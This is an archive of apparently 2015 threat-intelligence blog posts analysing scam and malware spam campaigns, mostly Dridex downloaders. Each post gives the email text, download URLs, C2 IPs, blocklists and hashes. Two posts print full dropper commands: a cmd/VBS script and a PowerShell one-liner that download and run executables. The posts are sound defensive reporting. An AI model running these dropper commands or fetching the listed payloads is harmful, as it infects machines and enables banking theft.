From: Bruce Lo [mailto:bruce@publicdmc.cn]I've explained this particular scam so many times that I made a video explaining it..
Date: 14:59 Wednesday 15th April 2015
Subject: [victimdomain] Registration
Priority: High
To whom it may concern:
We are the Registrars accredited by China Internet Network Information Center. We have something to confirm with you. On April 7, 2015, we received an application in which a company by the name Presg Group applied to register " victimdomain " as their Brand Name and some Asia domain names through our firm.
Now we are handling this registration. After our initial checking, we found that the name are identical to your company's. We need to check with you whether your company has authorized that company to register these names. If you have authorized this, we will finish the registration at once. If not, please let us know within 7 workdays, in which case we will dicuss the matter more thoroughly. If not otherwise advised within that time limit we will proceed with the registration for Presg Group . We will be waiting for your reply. Have a nice day!
Best Regards
Bruce Lo
Registration Dept.
Phone: +86.55165184482
Fax: +86.55165128724
Website:http://www.pdatamc.org/
Address: No. 789, XiYou Road, Zhengwu District, HeFei City, AnHui Province, China
Sponsored by..
Wednesday 15 April 2015
pdatamc.org / publicdmc.cn domain scam
This email message is actually a spam promoting a long-running scam where an unscrupulous party is attempting to sell overpriced and worthless domains to their intended victim.
businessexecutives01.com / theexecutivesbrand.com scam
From: Sterling HudsonThe link in the email does to www.businessexecutives01.com:8133/wayne/ which is an anonymously registered domain hosted on a spam server at 123.249.39.89 in China. The links on businessexecutives01.com website all lead to theexecutivesbrand.com which is basically a mirror of the content.
Date: 15 April 2015 at 14:12
Subject: Re: you were chosen as a potential candidate...
Dear,
You were recently chosen as a potential candidate to represent 2015 Worldwide Branding Registry of Distinguished Professionals and Executives.
We are pleased to inform you that your candidacy was formally approved May 2nd. Congratulations. The Publishing Committee selects potential candidates based not only upon their current standing, but focusing as well on criteria from executive and professional directories, associations, and trade journals.
Given your background, the Director believes your profile makes a fitting addition to our publication. There is no fee nor obligation to be listed. As we are working off of secondary sources, we must receive verification from you that your profile is accurate. After receiving verification, we will validate your registry listing within seven business days.
Once finalized, your listing will share prominent registry space with thousands of fellow accomplished individuals across the globe, each representing accomplishments within their own geographical area.
To verify your profile and accept the candidacy, please visit here.
Our registration deadline for this year's candidates is May 28th. To ensure you are included, we must receive your verification on or before this date. On behalf of our Committee, I salute your achievement and look forward to welcoming you to our association.
Sincerely,
Benjamin Morisson
Editor in Chief
Worldwide Selection Committee 2015
If you don't want to receive emails any more, please Unsubscribe
There are a number of this scammy spam sites on the same servers. I recommend that you block all the following sites as spam:
businessexecutives01.com
dirtyemojis.ru
foldemholdem.com
ironchampusa.ru
truepeptide.net
theexecutivesbrand.com
Malware spam: "Invoice from Living Water" / "Natalie [mailto:accounts@living-water.co.uk]"
From: Natalie [mailto:accounts@living-water.co.uk]In the sample that I received, the attachment was named Inv_300846161_from_Living_W.doc which has a VirusTotal detection rate of 1/55. This contains a malicious macro [pastebin] which downloads a file from the following location:
Sent: Wednesday, April 15, 2015 9:43 AM
Subject: Invoice from Living Water
Dear Customer :
Your invoice is attached. Please remit payment at your earliest convenience.
Thank you for your business - we appreciate it very much.
Sincerely,
Living Water
0203 139 9051
http://adlitipcenaze.com/353/654.exe
There are probably other download locations, but they will all have the same payload. This is saved as %TEMP%\rizob1.0.exe and currecntly has a detection rate of 6/57. Automated analysis tools [1] [2] [3] show attempted connections to the following IPs:
89.28.83.228 (StarNet, Moldova)
78.24.218.186 (TheFirst-RU, Russia)
37.140.199.100 (Reg.Ru Hosting, Russia)
According to this Malwr report it drops a Dridex DLL with a detection rate of 4/57.
Recommended blocklist:
89.28.83.228
78.24.218.186
37.140.199.100
MD5s:
2ecf5e35d681521997e293513144fd80
9932c4a05ca0233f27b0f8404a8dc5bd
68e1e7251314944a4b4815adced70328
Tuesday 14 April 2015
Digital Networks CJSC aka DINETHOSTING and 79.137.224.0/20
I ran an analysis on 1672 sites [csv] in this range and only two were tagged as malicious by Google and none by SURBL, which is actually less than I would expect on a sample of this size. I note that many sites have reputational problems at WOT which seem to be because of an expired Spamhaus listing (see this example).
If you've blocked this /20 then I suggest that it is reasonably safe to unblock, although I would regard other DINETHOSTING ranges with caution.
Malware spam: "Kairen Varker [mailto:kvarker@notifications.kashflow.com]" / "Invoice from"
From: Kairen Varker [mailto:kvarker@notifications.kashflow.com] On Behalf Of Kairen VarkerIn this case the attachment is called Invoice-83230.xls which is currently undetected by AV vendors. It contains this malicious macro [pastebin] which downloads a component from the following location (although there are probably more than this):
Sent: Tuesday, April 14, 2015 9:26 AM
Subject: Invoice from
I have made the changes need and the site is now mobile ready . Invoice is attached
http://925balibeads.com/94/053.exe
This is saved as %TEMP%\stepk1.5a.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] [3] [4] shows the malware phoning home to:
78.24.218.186 (TheFirst-RU, Russia)
176.67.160.187 (UK2, UK)
87.236.215.151 (OneGbits, Lithuania)
154.69.104.137 (Sandton Telkom, South Africa)
107.191.46.222 (Vultr Holdings / Choopa LLC, Canada)
94.23.171.198 (OVH, Czech Republic)
74.119.194.18 (RuWeb Corp, US)
37.140.199.100 (Reg.Ru Hosting, RUssia)
89.28.83.228 (StarNet SRL, Moldova)
The Malwr report shows that among other files it drops a malicious Dridex DLL with a detection rate of 2/57.
Recommended blocklist:
78.24.218.186
184.25.56.188
176.67.160.187
87.236.215.151
154.69.104.137
107.191.46.222
94.23.171.198
74.119.194.18
37.140.199.100
89.28.83.228
MD5s:
e46dcc4a49547b547f357a948337b929
1748fc9c5c0587373bf15a6bda380543
1e010195d2e5f6096095078482624995
Thursday 9 April 2015
Namailu.com spam
| From: Shana Felton [9k7bf-2976014268@serv.craigslist.org] Date: 9 April 2015 at 19:10 Subject: New commitment invitation - [redacted] | ||
I've never heard of Namailu so I assumed that it was a virus. I couldn't detect a malicious payload though, and further investigation indicates that this is a wannabe dating site that appears to be promoting itself through spam.
Clicking through the link leads to https://www.namailu.com/Smith.Sarah.206
The spam messages come from a range of IPs that are also used to spam out promotional material for a site called dirtyemojis.com (using a redirector of dirtyemojis.ru). The spam is sent from a range of Chinese IP addresses, including:
115.221.50.15
115.221.50.179
115.221.51.238
115.221.53.228
115.221.54.15
115.221.55.46
115.221.56.29
115.221.60.212
115.221.63.38
In each case the "From" address is fake, for example:
Shana Felton [9k7bf-2976014268@serv.craigslist.org]
Nestor Blackwell [orders@floristexpress.com.au]
Shirley Webb [rio@e-mail.com]
Mauricio Lundy [marilyndukacz@aol.com]
Edward Ybarra [v.wittke@schafmail.de]
A quick search of the body text of the message shows that it has been spammed out quite widely.
There are no contact details on the website, but the "User Agreement" page says that it is owned by Namailu Online Limited of New Zealand. It turns out that the New Zealand Companies Office offers very good information, and this is actually a real company.
The two directors listed are:
Philipp Rudolf RIPA
26 Whitehills Road, Rd 1, Silverdale, 0994 , New Zealand
Rudolf SAYEGH
111 Pilkington Road, Panmure, Auckland, 1072 , New Zealand
Incidentally, if you want to serve legal papers then the Pilkington Road address is the one to use. There aren't many people by the name of "Philipp Ripa" or "Rudolf Sayegh" in New Zealand, that is for sure.
A look at their Facebook page shows some information about the product being in development, but no other real details. Their spares Twitter page at @namailu shows they have four followers. I am one of them.
I'm going to be charitable and suggest that the people running Namailu have contracted another party to do the spamming and are possibly unaware of what is going on.
However, this clueless approach does not bode well for a site that deals in highly personal data and my personal opinion would be to give this particular outfit a very wide berth.
Malware spam: "Matthews, Tina [tina@royalcarson.com]" / "Credit card transaction" / "Royal Wholesale Electric"
From: Matthews, Tina [tina@royalcarson.com]Running in parallel to this is another claiming to be from UK firm AquaAid which has been going on for a long time. In the first case the attachment is 20150326094147512.doc and in the second it is CAR015890001.doc, but they are the same malicious document.
Date: 9 April 2015 at 10:48
Subject: Credit card transaction
Here is the credit card transaction that you requested.
Tina Matthews
Royal Wholesale Electric
2801 East 208th Street
Carson, CA 90810
310-637-6377 Phone
310-603-9883 Fax
tina@royalcarson.com
The document is currently undetected by AV vendors and contains a malicious macro [pastebin] which downloads a binary from:
http://onemindgroup.com/366/114
This is saved as %TEMP%\ittext1.5.exe and has a VirusTotal detection rate of 3/49. Automated analysis tools [1] [2] [3] [4] show traffic to the following IPs:
91.230.60.219 (Docker Ltd, Russia)
66.110.179.66 (Microtech Tel, US)
176.108.1.17 (Cadr-TV LLE TVRC, Ukraine)
202.44.54.5 (World Internetwork Corporation, Thailand)
87.236.215.103 (OneGbits, Lithuania)
128.199.203.165 (DigitalOcean Cloud, Singapore)
128.135.197.30 (University Of Chicago, US)
185.35.77.160 (Corgi Tech Limited, UK)
46.101.38.178 (Digital Ocean, UK)
95.163.121.51 (Digital Networks CJSC aka DINETHOSTING, Russia)
92.41.107.253 (Hutchison 3G, UK)
According to the Malwr report is also drops another variant of the downloader [VT 4/57] and a Dridex DLL [VT 4/57].
Recommended blocklist:
91.230.60.219
66.110.179.66
176.108.1.17
202.44.54.5
87.236.215.103
128.199.203.165
128.135.197.30
185.35.77.160
95.163.121.0/24
MD5s:
03ab12e578664290fa17a1a95abd71c4
48f39c245ec68bdbe6c0c93313bc8f74
90ebd79d1eac439c9c4ee1a056c9e879
62f33c7b850845cb66dcaa69e2af4443
Wednesday 8 April 2015
Malware spam: "Invoice from COMPANY NAME" / 31.24.30.12 / 46.30.43.102
The example I saw read:
From: Mitchel LevyThe link in the email has an address using the domain afinanceei.com plus a subdomain based on the recipients email address. It also has the recipients email address embedded in the URL, for example:
Date: 8 April 2015 at 13:45
Subject: Invoice from MOTHERCARE
Your latest invoice is now available for download. We kindly advise you to pay the invoice in time.
Download your invoice here.
Thanks for attention. We appreciate your business.
If you have any queries, please do not hesitate to contact us.
Mitchel Levy, MOTHERCARE
http://victimbfe.afinanceei.com/victim@victim.domain/
This is hosted on 31.24.30.12 (Granat Studio / Tomgate LLC, Russia) and it leads to a landing page that looks like this:
http://31.24.30.12/api/Invoice.xls
At the moment the download server seems very unstable and is generating a lot of 500 errors. Incidentally, http://31.24.30.12/api/ shows a fake page pretending to be from Australian retailer Kogan.
As you might guess, Invoice.xls contains a malicious macro [pastebin] but the real action is some data hidden in the spreadsheet itself:
That's pretty easy to decode, and it instructs the computer to download a malicious binary from:
http://46.30.43.102/cves/kase.jpg
This is saved as %TEMP%\dfsdfff.exe. Unsurprisingly, 46.30.43.102 is another Russian IP, this time EuroByte LLC.
This binary has a VirusTotal detection rate of 6/57. Automated analysis tools [1] [2] [3] [4] show it communicating with the following IPs:
109.74.146.18 (VNET a.s., Bulgaria)
176.81.92.142 (Telefonica, Spain)
147.96.6.154 (Universidad Complutense De Madrid, Spain)
199.201.121.169 (Synaptica, Canada)
210.205.126.189 (Nowonwoman, Korea)
37.58.49.37 (Leaseweb, Germany)
87.117.229.29 (iomart, UK)
108.61.189.99 (Choopa LLC, US)
116.75.106.118 (Hathway, India)
107.191.46.222 (Choopa LLC, Canada)
In addition there are some Akamai IPs which look benign:
184.25.56.212
184.25.56.205
2.22.234.90
According to this Malwr report it drops several files including a malicious Dridex DLL which is the same one found in this attack.
Recommended blocklist:
109.74.146.18
176.81.92.142
147.96.6.154
199.201.121.169
210.205.126.189
37.58.49.37
87.117.229.29
108.61.189.99
116.75.106.118
107.191.46.222
46.30.43.102
31.24.30.12
MD5s:
e8cd8be37e30c9ad869136534f358fc5
671c65cedc8642adf70ada3f74d5da19
a4af11437798b7de5a0884623ed42478
UPDATE 1:
There is at least one other server at 95.163.121.22 (Digital Networks CJSC aka DINETHOSTING, Russia) being used as a location to click through to (I recommend you block the entire 95.163.121.0/24 range). Between those two servers I can see the domains listed below in use. I suspect that there are others given the limited alphabetic range
abiliingfinance.com
abilingffinance.com
abilingfienance.com
abilingfinaance.com
abilingfinancee.com
abilingfinancey.com
abilingfinnance.com
abilingggfinance.com
abilinngfinance.com
afinanccebifling.com
afinanccebiling.com
afinanceas.com
afinancebbi.com
afinancebill.com
afinancecc.com
afinanceebb.com
afinanceei.com
afinancei.com
afinanceobilhing.com
afinanceobiling.com
afinanceqbilzing.com
afinancesh.com
afinancewbidling.com
afinanceyer.com
afinancrebiling.com
afinancrebixling.com
afinandebiling.com
afinangebiling.com
afinangebilqing.com
afinanrebileing.com
afinanrebiling.com
afinansebiling.com
afinansebilling.com
afinanwebiling.com
afinanwebilsing.com
asfinancebbi.com
asfinancebill.com
asfinancecc.com
asfinancee.com
asfinanceebb.com
asfinanceei.com
asfinancei.com
asfinancesh.com
asfinanceyer.com
assfinanceas.com
bbbilingfinancee.com
bbiliingfinance.com
bbilingffinance.com
bbilingfienance.com
bbilingfinaance.com
bbilingfinancee.com
bbilingfinancey.com
bbilingfinnance.com
bbilingggfinance.com
bbilinngfinance.com
bbillingfinance.com
biliingfinance.com
bilingffinance.com
bilingfienance.com
bilingfinaance.com
bilingfinancee.com
bilingfinancey.com
bilingfinnance.com
bilingggfinance.com
bilinngfinance.com
cfinanccebifling.com
cfinanceobilhing.com
cfinanceqbilzing.com
cfinancewbidling.com
cfinancrebixling.com
cfinandebilping.com
cfinangebilqing.com
cfinansebilling.com
cfinanwebilsing.com
financcebifling.com
financcebiling.com
financeobilhing.com
financeobiling.com
financeqbilzing.com
financewbidling.com
financewbiling.com
financrebiling.com
financrebixling.com
finandebilping.com
finangebiling.com
finangebilqing.com
finanrebileing.com
finanrebiling.com
finansebiling.com
finansebilling.com
finanwebiling.com
finanwebilsing.com
Malware spam: "TWO UNPAID INVOICES" / "Wayne Moore [wayne44118@orionplastics.net]"
From: Wayne Moore [wayne44118@orionplastics.net]In this case the email was malformed and the attachment REMITTANCE & WIRE TRANSFER ADDRESS.DOC wasn't downloadable (this may be a temporary problem). The document has a detection rate of just 1/56. Extracting the document revealed this malicious macro [pastebin] which downloads an additional component from:
Date: 8 April 2015 at 09:03
Subject: TWO UNPAID INVOICES
4/3----- LAST WEEK I CALLED REGARDS TWO UNPAID INVOICES FROM JAN 2015
INVOICE # 029911 DATED 1/7/15 FOR $840.80
INVOICE # 030042 DATED 1/30/15 FOR $937.00
PLEASE ADVISE WHEN YOU SENT CHECK AND TO WHAT ADDRESS
I HAVE ATTACHED THE NEW REMIT TO ADDRESS IN CASE YOU DON’T HAVE IT
REGARDS-WAYNE
http://fzsv.de/11/004.exe
There are usually other download locations in different variants of the document, but the downloaded executable will be the same. The executable is saved as %TEMP%\c48.exe. This malicious binary has a detection rate of 6/54. Automated analysis tools [1] [2] [3] shows it phoning home to the following IPs:
37.140.199.100 (Reg.Ru Hosting, Russia)
176.67.160.187 (UK2, UK)
81.148.134.130 (BT, UK)
46.228.193.201 (Aqua Networks Ltd, Germany)
83.136.80.46 (myLoc, Germany)
The Malwr report shows it attempting to connect to a couple a Akamai IPs that I suspect are NOT malicious and would cause collateral damage if blocked:
90.84.136.185
184.25.56.220
According to the same Malwr report it drops a Dridex DLL with a detection rate of 4/57.
Recommended blocklist:
37.140.199.100
176.67.160.187
81.148.134.130
46.228.193.201
83.136.80.46
MD5s:
3e3a09644170ad3184facb4cace14f8a
671c65cedc8642adf70ada3f74d5da19
14c2795bcc35c3180649494ec2bc7877
Tuesday 7 April 2015
Malware spam: "COMPANY NAME has issued the claim against you and passed for consideration to HM Courts [VM1993LVW]"
From: Isiah Mosley [Rosella.e6@customer.7starnet.com]
Date: 7 April 2015 at 14:09
Subject: Schroders has issued the claim against you and passed for consideration to HM Courts [VM1993LVW]
Schroders,Isiah Mosley
The company name is randomly chose. In the above example the attachment was called VM1993LVW.doc which matched the reference in the subject. The Word document contains a malicious macro [pastebin] which executes the following command:
cmd.exe /c @echo dim gyuFYFGuigddd: Set gyuFYFGuigddd = createobject("Microsoft.XMLHTTP")>gyuFYFGuig.vbs & @echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Open "GET", "http://185.39.149.178/aszxmy/image04.gif", False>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Send>>gyuFYFGuig.vbs & @echo Set environmentVars = WScript.CreateObject("WScript.Shell").Environment("Process")>>gyuFYFGuig.vbs & @echo tempFolder = environmentVars("TEMP")>>gyuFYFGuig.vbs & @echo Fileopen = tempFolder + "\dfsdfff.exe">>gyuFYFGuig.vbs & @echo with bStrm>>gyuFYFGuig.vbs & @echo .type = 1 >>gyuFYFGuig.vbs & @echo .open>>gyuFYFGuig.vbs & @echo .write gyuFYFGuigddd.responseBody>>gyuFYFGuig.vbs & @echo .savetofile Fileopen, 2 >>gyuFYFGuig.vbs & @echo end with>>gyuFYFGuig.vbs & @echo Set GBIviviu67FUGBK = CreateObject("Shell.Application")>>gyuFYFGuig.vbs & @echo GBIviviu67FUGBK.Open Fileopen>>gyuFYFGuig.vbs & cscript.exe gyuFYFGuig.vbsI can't be bothered to work out all of the crap with the .vbs which may of may not be importance. Along with an alternate macro, I can see download locations from:
http://185.39.149.178/aszxmy/image04.gif
http://148.251.87.253/aszxmy/image04.gif
For the record, 185.39.149.178 is OOO A.S.R. in Russia and 148.251.87.253 is Hetzner in Germany.
The downloaded .GIF file is definitely not a GIF and is instead an executable that gets saved as %TEMP%\dfsdfff.exe. This has a VirusTotal detecton rate of 2/56. Automated analysis tools [1] [2] [3] show the malware phoning home to:
151.252.48.36 (Vautron Serverhousing, Germany)
According to the Malwr report, it drops a DLL with a detection rate of 2/56 which is most likely a Dridex DLL.
Recommended blocklist:
151.252.48.36
148.251.87.253
185.39.149.178
MD5s:
a4e14c88da9e1a74cd7c26ded99b6a0a
c86a9d012e372d0c3a82b14978ffa1f0
Malware spam: "Order Confirmation Order BNTO056063 06/04/2015" / "Sales-BNThermic [Sales@bnthermic.co.uk]"
From: Sales-BNThermic [Sales@bnthermic.co.uk]
Date: 7 April 2015 at 09:48
Subject: Order Confirmation Order BNTO056063 06/04/2015
Thank you for your order, please find attached confirmation.
Best Regards
BN Thermic
In all cases, the attached file is called BNTO056063.DOC, but there are actually at least four different variants with one of four malicious macros [1] [2] [3] [4] which then download a component from one of the following locations:
http://heubett.de/220/68.exe
http://fzsv.de/220/68.exe
http://deosiibude.de/deosiibude.de/220/68.exe
http://bewakom.de/220/68.exe
This file is then saved as %TEMP%\wabat1.1a.exe. This executable is the same one as used in this attack and the payload is the Dridex banking trojan.
Malware spam: "EBOLA INFORMATION" / "noreply@ggc-ooh.net"
From: noreply@ggc-ooh.netAttached is a file 30.03.15 Ebola Virus (2).doc which contains this malicious macro [pastebin] which is contains a lot of girls names as variables (which makes a nice change from the randomly-generated stuff I suppose).
Reply-To: noreply@ggc-ooh.net
Date: 7 April 2015 at 08:58
Subject: EBOLA INFORMATION
This email is generated from an unmanned mailbox. Dr N J Gaw can be contacted via noreply@ggc-ooh.net
PLEASE SEE THE ATTACHED CORRESPONDENCE FOR YOUR INFORMATION.
THANK YOU.
When decoded the macro downloads a component from:
http://deosiibude.de/deosiibude.de/220/68.exe
VirusTotal submissions seem to be down at the moment, so I can't tell you what the detection rate is. Automated analysis tools [1] [2] [3] show it phoning home to the following IPs (ones in bold are most likely static, the others look to be dynamic):
37.140.199.100 (Reg.Ru Hosting, Russia)
46.228.193.201 (Aqua Networks Ltd, Germany)
130.241.92.141 (Goteborgs Universitet, Sweden)
46.101.49.125 (Digital Ocean Inc, UK)
122.167.6.68 (ABTS, India)
5.100.249.215 (O.M.C. Computers & Communications Ltd, Israel)
85.255.173.109 (Satnet Ltd, Bulgaria)
217.37.39.235 (BT Broadband, UK)
81.190.50.232 (Multimedia Polska S. A., Poland)
89.228.15.18 (Multimedia Polska S. A., Poland)
According to the Malwr report it drops a whole load of files including what is probably a Dridex DLL.
Recommended blocklist:
37.140.199.100
46.228.193.201
130.241.92.141
46.101.49.125
122.167.6.68
85.255.173.109
5.100.249.215
217.37.39.235
81.190.50.232
46.228.193.201
89.228.15.18
MD5s:
E4CC002A95CAAF4481CB7140BBE96C58
C86A9D012E372D0C3A82B14978FFA1F0
F98A674A5FA473AC9BF738636FF6374E
Thursday 2 April 2015
Malware spam: "Copy invoices Snap on Tools Ltd" / "Allen, Claire [Claire.Allen@snapon.com]"
From: Allen, Claire [Claire.Allen@snapon.com]I have only seen one copy of this with an attachment SKETTDCCSMF14122514571.doc which contains this malicious macro [pastebin], which downloads a further component from:
Date: 24 February 2015 at 14:41
Subject: Copy invoices Snap on Tools Ltd
Good Afternoon
Attached are the copy invoices that you requested.
Regards
Claire
Your message is ready to be sent with the following file or link attachments:
SKETTDCCSMF14122514571
Note: To protect against computer viruses, e-mail programs may prevent sending or receiving certain types of file attachments. Check your e-mail security settings to determine how attachments are handled.
http://ws6btg41m.homepage.t-online.de/025/42.exe
This executable has a detection rate of 5/57. Various automated analyses [1] [2] [3] [4] show attempted communications to the following IPs:
91.242.163.70 (OOO Sysmedia, Russia)
72.167.62.27 (GoDaddy, US)
62.113.219.35 (23Media GmbH, Germany)
46.101.49.125 (Digital Ocean, UK)
130.241.92.141 (Goteborgs Universitet, Sweden)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc., US)
94.23.173.233 (OVH, Czech Republic)
14.98.243.243 (Tata Indicom, India)
5.100.249.215 (O.M.C. Computers & Communications, Israel)
62.113.223.227 (23Media GmbH, Germany)
According to this Malwr report it drops another version of the downloader called edg1.exe [VT 4/57] and a malicious Dridex DLL [VT 2/57].
Recommended blocklist:
91.242.163.70
72.167.62.27
62.113.219.35
46.101.49.125
130.241.92.141
198.245.70.182
94.23.173.233
14.98.243.243
5.100.249.215
62.113.223.227
MD5s:
dc92858693f62add2eb4696abce11d62
6fb2f86986e074cf44bd4c9f68e9822e
9565b17a4f1221fee473d0d8660dc26d
62e780a6237c6f9fd0a8e16a2823562d
Malware spam: "Scanned document from HP/Brother/Epson Scanner [87654321]"
Now.. if you are reading this then you are probably not the sort of person who would open an unsolicited message of this sort. Would you?
From: Cindy Pate [Caroline.dfd@flexmail.eu]
Date: 2 April 2015 at 11:09
Subject: Scanned document from HP Scanner [66684798]
Reply to: HP-Scanner@flexmail.eu
Model:KX-240NGZDC
Location: 1st Floor Office
File Format: DOC (Medium)
Resolution: 300dpi x 300dpi
Attached file is scanned document in DOC format.
Use Microsoft Office Word of Microsoft Corporation to view the document.
----------
From: Sterling Hoffman [Lara.dc4@astroexports.com]
Date: 2 April 2015 at 11:00
Subject: Scanned document from Brother Scanner [07623989]
Reply to: Brother-Scanner@astroexports.com
Model:CG-240NWDUL
Location: 1st Floor Office
File Extension: DOC (Medium)
Resolution: 300dpi x 300dpi
Attached file is scanned document in DOC format.
Use Microsoft Office Word of Microsoft Corporation to view the document.
----------
From: Manuel Velez [Yesenia.10@acv.nl]
Date: 2 April 2015 at 12:04
Subject: Scanned document from Epson Scanner [81829722]
Reply to: Epson-Scanner@acv.nl
Model:JS-240NRZYV
Location: 1st Floor Office
File Format: DOC (Medium)
Resolution: 300dpi x 300dpi
Attached file is scanned document in DOC format.
Use Microsoft Office Word of Microsoft Corporation to view the document.
I have seen three different malicious attachments with low detection rates [1] [2] [3] which appear to contain one of two macros [1] [2] which download a further component from one of the following locations:
http://93.158.117.163:8080/bz1gs9/kansp.jpg
http://78.47.87.131:8080/bz1gs9/kansp.jpg
Those servers are almost definitely malicious in other ways, the IPs are allocated to:
93.158.117.163 (Aitos Svenska / Port80 , Sweden)
78.47.87.131 (Hetzner, Germany)
This is then saved as %TEMP%\sdfsdffff.exe which has a VirusTotal detection rate of just 1/56. Automated analysis [1] [2] [3] indicates that it calls home to:
188.120.225.17 (TheFirst-RU, Russia)
92.63.88.83 (MWTV, Latvia)
121.50.43.175 (Tsukaeru.net, Japan)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
82.151.131.129 (Doruknet, Turkey)
46.19.143.151 (Private Layer Inc, Switzerland)
45.55.154.235 (Digital Ocean, US)
195.130.118.92 (University Of Ioannina, Greece)
199.201.121.169 (Synaptica, Canada)
95.211.168.10 (Leaseweb, Netherlands)
222.234.230.239 (Hanaro Telecom, Korea)
Although the automated tools indicate that no files were dropped, the payload for this is almost definitely Dridex.
Recommended blocklist:
188.120.225.17
92.63.88.0/24
121.50.43.175
95.163.121.0/24
82.151.131.129
46.19.143.151
45.55.154.235
195.130.118.92
199.201.121.169
95.211.168.10
222.234.230.239
93.158.117.163
78.47.87.131
MD5s:
96f3aa2402daf9093ef0b47943361231
cff4b8b7f9adf1f5964b495a8116d196
68fb9aadda63d18f1b085d5bd8815223
64fa6501bd4d32b2958922598008ca96
Malware spam: "Sage Invoice [invoice@sage.com]" / "Outdated Invoice"
This fake financial email is not from Sage but is a simple forgery that leads to malware.
The link in the email does not in face go to Sage, but it downloads a file from hightail.com. The payload is identical to the one used in this concurrent spam run.
From: Sage Invoice [invoice@sage.com]
Date: 2 April 2015 at 12:24
Subject: Outdated Invoice
The link in the email does not in face go to Sage, but it downloads a file from hightail.com. The payload is identical to the one used in this concurrent spam run.
Malware spam: "invoice@bankline.ulsterbank.ie" / "Outstanding invoice"
From: invoice@bankline.ulsterbank.ie [invoice@bankline.ulsterbank.ie]
Date: 2 April 2015 at 11:46
Subject: Outstanding invoice
Dear [victim],
Please find the attached copy invoice which is showing as unpaid on our ledger.
To download your invoice please click here
I would be grateful if you could look into this matter and advise on an expected payment date .
Courtney Mason
Credit Control
Tel: 0845 300 2952
The link in the email leads to a download location at hightail.com (the sample I saw downloaded from https://www.hightail.com/download/e?phi_action=app/directDownload&fl=SWhZekZucVhVbTlFQlFJWjA4bnVnVE9yZWt5UmdteDRsUjJuWENHRzVZbz0) which is a file called Doc_0062119-LQ.zip which in turn contains the malicious executable Doc_0062119-LQ.scr.
The executable has a VirusTotal detection rate of 3/57 and has characteristics that identify it as Upatre. Automated analysis tools [1] [2] [3] [4] [5] show that it downloads additional components from:
eduardohaiek.com/images/wicon1.png
edrzambrano.com.ve/images/wicon1.png
It also POSTs data to 141.105.141.87 (Makiyivka Online Technologies Ltd, Ukraine) in a characteristic Upatre manner:
http://141.105.141.87:13840/0204uk11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
According to the Malwr report, the downloader drops a file gkkjxyz22.exe which has a detection rate of 2/57. This is probably the Dyre banking trojan.
Recommended blocklist:
141.105.140.0/22
eduardohaiek.com
edrzambrano.com
MD5s:
4c666564c1db6312b9f05b940c46fa9a
876900768e06c3df75714d471c192cc6
Wednesday 1 April 2015
Malware spam: "Your Remittance Advice COMPANY NAME"
From: Kate Coffey
Date: 1 April 2015 at 15:00
Subject: Your Remittance Advice PEEL SOUTH EAST
Dear sir or Madam,
Please find attached a remittance advice (JT934IYIP.doc) for your information.
Should you need any further information, please do not hesitate to contact us.
Best regards
PEEL SOUTH EAST
Attached is a Word document with a filename matching the body one in the text. Every email attachment we have seen so far is slightly different, but there seem to be just two different malicious macros [1] [2] [pastebin] which download a component from one of the following locations:
http://31.41.45.175/sqwere/casma.gif
http://91.242.163.78/sqwere/casma.gif
Those servers are almost certainly entirely malicious, with IPs assigned to:
31.41.45.175 (Relink Ltd, Russia)
91.242.163.78 (Sysmedia, Russia)
This file is saved as %TEMP%\DOWUIAAFQTA.exe and has a VirusTotal detection rate of 4/49. Automated analysis tools [1] [2] [3] show attempted connections to:
188.120.225.17 (TheFirst-RU, Russia)
45.55.154.235 (Digital Ocean, US)
188.126.72.179 (Portlane AB, Sweden)
1.164.114.195 (Data Communication Business Group, Taiwan)
46.19.143.151 (Private Layer Inc, Switzerland)
79.149.162.117 (Telefonica Moviles Espana, Spain)
5.135.28.104 (OVH / Simpace.com, UK)
According to this Malwr report it downloads the same Dridex DLL as seen in this spam run plus another variant of the downloader with a detection rate of 3/56.
Recommended blocklist:
188.120.225.17
45.55.154.235
188.126.72.179
1.164.114.195
46.19.143.151
79.149.162.117
5.135.28.104/29
31.41.45.175
91.242.163.78
MD5s:
b4be0bb41af791004ae3502c5531773b
7bede7cc84388fb7bfa2895dba183a20
564597fd05a31456350bac5e6c075fc9
Malware spam "Unpaid Invoice [09876] attached" / "This is your Remittance Advice [ID:12345]" with VBS-in-ZIP attachment
Example subjects include:
Unpaid Invoice [09323] attached
Unpaid Invoice [86633] attached
Unpaid Invoice [35893] attached
This is your Remittance Advice [ID:42667]
This is your Remittance Advice [ID:69951]
Example senders:
SAROSSA PLC
32RED
NOIDA TOLL BRIDGE CO
Example attachment names:
RC422QNSB.zip
ML82034PMRY.zip
MK843NCAK.zip
OI8244LPNH.zip
ZW1760EHOG.zip
MANX FINANCIAL GROUP PLC
RARE EARTH MINERALS PLC
Inside is a malicious VBS script. It is likely that there are several different versions, the one working sample I saw looked like this [pastebin] which is very similar to the VBA macro used in this spam run yesterday.
When run (I don't recommend this!) it executes the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.202/sqwere/casma.gif','%TEMP%\giuguiGIUGdsuf87t6F.cab'); expand %TEMP%\giuguiGIUGdsuf87t6F.cab %TEMP%\giuguiGIUGdsuf87t6F.exe; Start-Process %TEMP%\giuguiGIUGdsuf87t6F.exe;Because there are probably several different versions of this script, there are probably several different download locations. In this case, a fake .GIF file is downloaded from a malware server at 193.26.217.202 (Servachok Ltd, Russia) which is actually an .EXE file, but it gets saved as a .CAB file. For no very good reason it is passed through EXPAND which does nothing but save it to %TEMP%\giuguiGIUGdsuf87t6F.exe.
This binary has a detection rate of 4/55. Automated analysis tools [1] [2] [3] [4] show that the malware attempts to phone home to:
188.120.225.17 (TheFirst-RU, Russia)
121.50.43.175 (Tsukaeru.net, Japan)
82.151.131.129 (DorukNet, Turkey)
92.63.88.83 (MWTV, Latvia)
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
199.201.121.169 (Synaptica, Canada)
188.226.129.49 (Digital Ocean, Netherlands)
192.64.11.232 (Synaptica, Canada)
77.74.103.150 (iway AG GS, Switzerland)
1.164.114.195 (Data Communication Business Group, Taiwan)
5.135.28.104 (OVH / Simpace.com, UK)
46.19.143.151 (Private Layer Inc, Switzerland)
